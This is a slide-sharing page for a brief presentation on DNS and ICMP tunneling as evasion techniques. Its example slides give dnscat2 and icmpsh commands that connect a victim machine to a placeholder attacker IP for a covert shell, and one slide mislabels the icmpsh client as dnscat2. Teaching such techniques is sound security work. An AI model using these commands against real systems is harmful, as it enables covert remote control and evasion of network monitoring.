IM
Uploaded byIlan Mindel
323 views

Tunneling

Tunneling is a method of cyber attack that sends and receives malicious data over legitimate protocols like DNS, ICMP, SSH, HTTP, and HTTPS to make the data look innocent. DNS and ICMP tunneling encode payload data in DNS queries and responses or ICMP packets to avoid detection by intrusion detection systems. Tools like dnscat2 and icmpsh can be used to establish covert connections between remote computers using DNS or ICMP tunneling.

Embed presentation

Infrastructure Tunneling 1
2 Tunneling Tunneling Tunneling is a method of cyber attack that send and receive malicious data over a legitimate protocol like: DNS, ICMP, SSH, HTTP ,HTTPS and make the data look innocent. The malicious code is covered by one of the protocols and using legitimate ports make the hacking harder to monitor and detect.
3 DNS Tunneling DNS Tunneling DNS Tunneling is a method of cyber attack that encodes the data of other programs or protocols in DNS queries and responses. DNS tunneling often includes data payloads that can be added to an attacked DNS server and used to control a remote server and applications. When using this tecniqe the payload is harder to detect and can avoid ids/ips (Instruction detection system / intrusion prevention system) and hide the traffic in a DNS protocol which look legitimate on the the monitoring systems.
4 DNS Tunneling - Example DNS Tunneling - Example One of the tools for DNS Tunneling is dnscat2. Installing dnscat2 server on kali (Attacker). • # apt-get update • # apt-get -y install ruby-dev git make g++ • # gem install bundler • # git clone https://github.com/iagox86/dnscat2.git • # cd dnscat2/server • # bundle install • # ruby ./dnscat2.rb Windows (Victim) runs dnscat2 client and connect to the attacker. • dnscat2-v0.07-client-win32.exe --dns server=(Ip of attack)
5 ICMP Tunneling ICMP Tunneling An ICMP tunnel is a method of cyber attack that encodes the data of other programs or protocols using ICMP echo requests and reply packets establishes a covert connection between two remote computers, using ICMP echo requests and reply packets. When using this tecniqe the payload is harder to detect and can avoid ids/ips (Instruction detection system / intrusion prevention system) and hide the traffic in a ICMP protocol which look legitimate on the the monitoring systems.
6 ICMP Tunneling - Example ICMP Tunneling - Example One of the tools for ICMP Tunneling is icmpsh. Donwlaod icmpsh server on kali (Attacker). https://github.com/inquisb/icmpsh • sysctl -w net.ipv4.icmp_echo_ignore_all=1 • perl icmpsh-m.pl (Ip Attacker) (Ip Victim) Windows (Victim) runs dnscat2 client and connect to the attacker. • Icmpsh.exe -t (IP attacker)

More Related Content

PPTX
Packet sniffers
byKunal Thakur
 
PPTX
Data encryption
byDeepam Goyal
 
PPTX
Sdn ppt
byPallavi Chhikara
 
PPTX
A Secure Model of IoT Using Blockchain
byAltoros
 
PPTX
ZIGBEE TECHNOLOGY ppt
byOECLIB Odisha Electronics Control Library
 
PPTX
What is Asymmetric Encryption? Understand with Simple Examples
byCheapSSLsecurity
 
PPTX
Biometric authentication ppt by navin 6 feb
byNavin Kumar
 
PPTX
Sniffer for the mobile phones
byUpender Upr
 
Packet sniffers
byKunal Thakur
 
Data encryption
byDeepam Goyal
 
Sdn ppt
byPallavi Chhikara
 
A Secure Model of IoT Using Blockchain
byAltoros
 
ZIGBEE TECHNOLOGY ppt
byOECLIB Odisha Electronics Control Library
 
What is Asymmetric Encryption? Understand with Simple Examples
byCheapSSLsecurity
 
Biometric authentication ppt by navin 6 feb
byNavin Kumar
 
Sniffer for the mobile phones
byUpender Upr
 

What's hot

PPTX
Biometrics ppt
byMOUNIKA VINNAKOTA
 
PPTX
Cryptography.ppt
byUday Meena
 
PPTX
Face recognition attendance system
byNaomi Kulkarni
 
PPTX
IoT Security, Threats and Challenges By V.P.Prabhakaran
byKoenig Solutions Ltd.
 
PDF
Nmap Basics
byamiable_indian
 
PPTX
Introduction To Dark Web
byAdityakumar Yadav
 
PPT
Biometrics Technology Intresting PPT
bypreeti tripathi
 
PPTX
Android task manager project presentation
byAkhilesh Jaiswal
 
PPTX
Neuralink
by898RakeshWaghmare
 
PPTX
neuralinktechnicalseminar.pptx
by20269vinay
 
PPT
PUBLIC KEY ENCRYPTION
byraf_slide
 
PPTX
Zigbee
byWaqarAhmad444
 
PDF
Overview on security and privacy issues in wireless sensor networks-2014
byTarek Gaber
 
PPT
INTRUSION DETECTION TECHNIQUES
byTrinity Dwarka
 
PDF
Neuralink white-paper. Elon Musk & Neuralink
byeraser Juan José Calderón
 
PPT
biometric technology
byAnmol Bagga
 
PPTX
BIS Report/Neuralink
byIdilBilgic
 
PPT
Fingerprint recognition
byranjit banshpal
 
PPTX
Mobile Number Portability
bySunny Agarwal
 
PPTX
Brain fingerprinting
bypgrr
 
Biometrics ppt
byMOUNIKA VINNAKOTA
 
Cryptography.ppt
byUday Meena
 
Face recognition attendance system
byNaomi Kulkarni
 
IoT Security, Threats and Challenges By V.P.Prabhakaran
byKoenig Solutions Ltd.
 
Nmap Basics
byamiable_indian
 
Introduction To Dark Web
byAdityakumar Yadav
 
Biometrics Technology Intresting PPT
bypreeti tripathi
 
Android task manager project presentation
byAkhilesh Jaiswal
 
Neuralink
by898RakeshWaghmare
 
neuralinktechnicalseminar.pptx
by20269vinay
 
PUBLIC KEY ENCRYPTION
byraf_slide
 
Zigbee
byWaqarAhmad444
 
Overview on security and privacy issues in wireless sensor networks-2014
byTarek Gaber
 
INTRUSION DETECTION TECHNIQUES
byTrinity Dwarka
 
Neuralink white-paper. Elon Musk & Neuralink
byeraser Juan José Calderón
 
biometric technology
byAnmol Bagga
 
BIS Report/Neuralink
byIdilBilgic
 
Fingerprint recognition
byranjit banshpal
 
Mobile Number Portability
bySunny Agarwal
 
Brain fingerprinting
bypgrr
 

Similar to Tunneling

PPTX
Network tunneling techniques
byinbroker
 
PDF
Coporate Espionage
byUTD Computer Security Group
 
PPTX
lecture5Ch03-bufferOverFlow-attack.ppt.pptx
byDavid Vera Olivera, PMP®, ITIL, SCM®
 
PPT
Network and security concepts
bysonuagain
 
PPTX
MVA slides lesson 8
byFabio Almeida- Oficina Eletrônica
 
PPT
Lecture7-8-Network Protocls attack in cyber.ppt
byMuhammadSaleemKhan26
 
PPTX
The Network Protocol Stack Revisited
byinbroker
 
PDF
Advance Malware CnC by Avkash k and dhawal shah
byAvkash Kathiriya
 
PDF
Network and DNS Vulnerabilities
byn|u - The Open Security Community
 
PPTX
Tunneling Techniques - HTTP-DNS-ICMP.pptx
byHimaVijayanITTeachin
 
PPT
Vulnerabilities in IP Protocols
bybabak danyal
 
PDF
CISSP Week 5
byjemtallon
 
PPT
Network security
byPresentaionslive.blogspot.com
 
PPTX
98 366 mva slides lesson 8
bysuddenven
 
PDF
TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
byEC-Council
 
PPT
null Pune meet - Evading Firewalls: Tunneling
byn|u - The Open Security Community
 
PPT
6005679.ppt
byAlmaOraevi
 
PDF
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
bynullowaspmumbai
 
PPTX
CompTIASecPLUS-Part1 Unlimited Edition- Edited.pptx
bymohedkhadar60
 
PDF
vulnerabilities in IP.pdf
byMuhammadSufyanAbbasi1
 
Network tunneling techniques
byinbroker
 
Coporate Espionage
byUTD Computer Security Group
 
lecture5Ch03-bufferOverFlow-attack.ppt.pptx
byDavid Vera Olivera, PMP®, ITIL, SCM®
 
Network and security concepts
bysonuagain
 
MVA slides lesson 8
byFabio Almeida- Oficina Eletrônica
 
Lecture7-8-Network Protocls attack in cyber.ppt
byMuhammadSaleemKhan26
 
The Network Protocol Stack Revisited
byinbroker
 
Advance Malware CnC by Avkash k and dhawal shah
byAvkash Kathiriya
 
Network and DNS Vulnerabilities
byn|u - The Open Security Community
 
Tunneling Techniques - HTTP-DNS-ICMP.pptx
byHimaVijayanITTeachin
 
Vulnerabilities in IP Protocols
bybabak danyal
 
CISSP Week 5
byjemtallon
 
Network security
byPresentaionslive.blogspot.com
 
98 366 mva slides lesson 8
bysuddenven
 
TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
byEC-Council
 
null Pune meet - Evading Firewalls: Tunneling
byn|u - The Open Security Community
 
6005679.ppt
byAlmaOraevi
 
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
bynullowaspmumbai
 
CompTIASecPLUS-Part1 Unlimited Edition- Edited.pptx
bymohedkhadar60
 
vulnerabilities in IP.pdf
byMuhammadSufyanAbbasi1
 

More from Ilan Mindel

PPTX
Reverse shell
byIlan Mindel
 
PPTX
Responder
byIlan Mindel
 
PPTX
Responder PPT
byIlan Mindel
 
PPTX
Ports and services
byIlan Mindel
 
PPTX
Ssrf
byIlan Mindel
 
PPTX
Password cracking
byIlan Mindel
 
PPTX
Xxe
byIlan Mindel
 
PPTX
Lfi rfi
byIlan Mindel
 
PPTX
Formula injection/DDE/Macro
byIlan Mindel
 
PPTX
Sql injection
byIlan Mindel
 
PPTX
Creds extraction
byIlan Mindel
 
PPTX
Xss
byIlan Mindel
 
Reverse shell
byIlan Mindel
 
Responder
byIlan Mindel
 
Responder PPT
byIlan Mindel
 
Ports and services
byIlan Mindel
 
Ssrf
byIlan Mindel
 
Password cracking
byIlan Mindel
 
Xxe
byIlan Mindel
 
Lfi rfi
byIlan Mindel
 
Formula injection/DDE/Macro
byIlan Mindel
 
Sql injection
byIlan Mindel
 
Creds extraction
byIlan Mindel
 
Xss
byIlan Mindel
 

Recently uploaded

PPTX
Types of Cryptograph Symmetric Ceaser cipher and also about Assymetric
byhamzaabdulqadeer11
 
PPTX
mc l2 Overview of Computer and Web-Technology.pptx
byavanikharde
 
PPT
Lecture_3 Network Securityeyeyggegeg.ppt
bysawsan202
 
PPT
Lecture_3 Network Securityyyeyeyyeeyyeywy.ppt
bysawsan202
 
PDF
ARTIFICIAL INTELLIGENCE DEVELOPMENT SERVICE
bydavidjohansen1597
 
PDF
WShell Gameplay and Games of Games of Games
byzramirezmtz9
 
PDF
WShell Gameplay and Games of Games of Games
byzramirezmtz9
 
PPTX
CaseStudy-CloudMigration -For USE CASE -Customer Success Info -6-Aug-25.pptx
bywinlentech
 
PDF
Here are the winners of KALIDASA SAMMAN.
byglcppro
 
PPTX
Bibhav Singh.pptx it's very useful for us it's in very good and very nice
byabhishekjaiswal5th33
 
PPT
html-forms in web development-courseICT.
bymadz33
 
PPTX
Abhishek Jaiswal.ppt.pptx for you it is very useful for me and I am sharing w...
byabhishekjaiswal5th33
 
PPT
Memory Organization In Assembly Language
byumairmuhammad0409
 
PPTX
Artificial Intelligence (AI) Technology Project Proposal _ by Slidesgo.pptx
byadhyaadi804
 
PDF
tokiohotellistening.pdf for tokiohotelfans
byrafaelgombos1234
 
PDF
classification of elements and periodicity.pdf
byaryanshreya2010
 
PPTX
PRITHVI theater, A true artist. Newzfeaturez.pptx
bysc05digital
 
PDF
Design For Test - Getting Test Automation value from Design Expressions.
byDavid Harrison
 
PPTX
Computer Science Degree for College .pptx
byHanenek1
 
DOCX
BestMaker.ai: The Complete Brand Story, Founder's Vision, and AI Creative Pla...
byssuser7381d6
 
Types of Cryptograph Symmetric Ceaser cipher and also about Assymetric
byhamzaabdulqadeer11
 
mc l2 Overview of Computer and Web-Technology.pptx
byavanikharde
 
Lecture_3 Network Securityeyeyggegeg.ppt
bysawsan202
 
Lecture_3 Network Securityyyeyeyyeeyyeywy.ppt
bysawsan202
 
ARTIFICIAL INTELLIGENCE DEVELOPMENT SERVICE
bydavidjohansen1597
 
WShell Gameplay and Games of Games of Games
byzramirezmtz9
 
WShell Gameplay and Games of Games of Games
byzramirezmtz9
 
CaseStudy-CloudMigration -For USE CASE -Customer Success Info -6-Aug-25.pptx
bywinlentech
 
Here are the winners of KALIDASA SAMMAN.
byglcppro
 
Bibhav Singh.pptx it's very useful for us it's in very good and very nice
byabhishekjaiswal5th33
 
html-forms in web development-courseICT.
bymadz33
 
Abhishek Jaiswal.ppt.pptx for you it is very useful for me and I am sharing w...
byabhishekjaiswal5th33
 
Memory Organization In Assembly Language
byumairmuhammad0409
 
Artificial Intelligence (AI) Technology Project Proposal _ by Slidesgo.pptx
byadhyaadi804
 
tokiohotellistening.pdf for tokiohotelfans
byrafaelgombos1234
 
classification of elements and periodicity.pdf
byaryanshreya2010
 
PRITHVI theater, A true artist. Newzfeaturez.pptx
bysc05digital
 
Design For Test - Getting Test Automation value from Design Expressions.
byDavid Harrison
 
Computer Science Degree for College .pptx
byHanenek1
 
BestMaker.ai: The Complete Brand Story, Founder's Vision, and AI Creative Pla...
byssuser7381d6
 

Tunneling

  • 1.
  • 2.
    2 Tunneling Tunneling Tunneling is amethod of cyber attack that send and receive malicious data over a legitimate protocol like: DNS, ICMP, SSH, HTTP ,HTTPS and make the data look innocent. The malicious code is covered by one of the protocols and using legitimate ports make the hacking harder to monitor and detect.
  • 3.
    3 DNS Tunneling DNS Tunneling DNSTunneling is a method of cyber attack that encodes the data of other programs or protocols in DNS queries and responses. DNS tunneling often includes data payloads that can be added to an attacked DNS server and used to control a remote server and applications. When using this tecniqe the payload is harder to detect and can avoid ids/ips (Instruction detection system / intrusion prevention system) and hide the traffic in a DNS protocol which look legitimate on the the monitoring systems.
  • 4.
    4 DNS Tunneling -Example DNS Tunneling - Example One of the tools for DNS Tunneling is dnscat2. Installing dnscat2 server on kali (Attacker). • # apt-get update • # apt-get -y install ruby-dev git make g++ • # gem install bundler • # git clone https://github.com/iagox86/dnscat2.git • # cd dnscat2/server • # bundle install • # ruby ./dnscat2.rb Windows (Victim) runs dnscat2 client and connect to the attacker. • dnscat2-v0.07-client-win32.exe --dns server=(Ip of attack)
  • 5.
    5 ICMP Tunneling ICMP Tunneling AnICMP tunnel is a method of cyber attack that encodes the data of other programs or protocols using ICMP echo requests and reply packets establishes a covert connection between two remote computers, using ICMP echo requests and reply packets. When using this tecniqe the payload is harder to detect and can avoid ids/ips (Instruction detection system / intrusion prevention system) and hide the traffic in a ICMP protocol which look legitimate on the the monitoring systems.
  • 6.
    6 ICMP Tunneling -Example ICMP Tunneling - Example One of the tools for ICMP Tunneling is icmpsh. Donwlaod icmpsh server on kali (Attacker). https://github.com/inquisb/icmpsh • sysctl -w net.ipv4.icmp_echo_ignore_all=1 • perl icmpsh-m.pl (Ip Attacker) (Ip Victim) Windows (Victim) runs dnscat2 client and connect to the attacker. • Icmpsh.exe -t (IP attacker)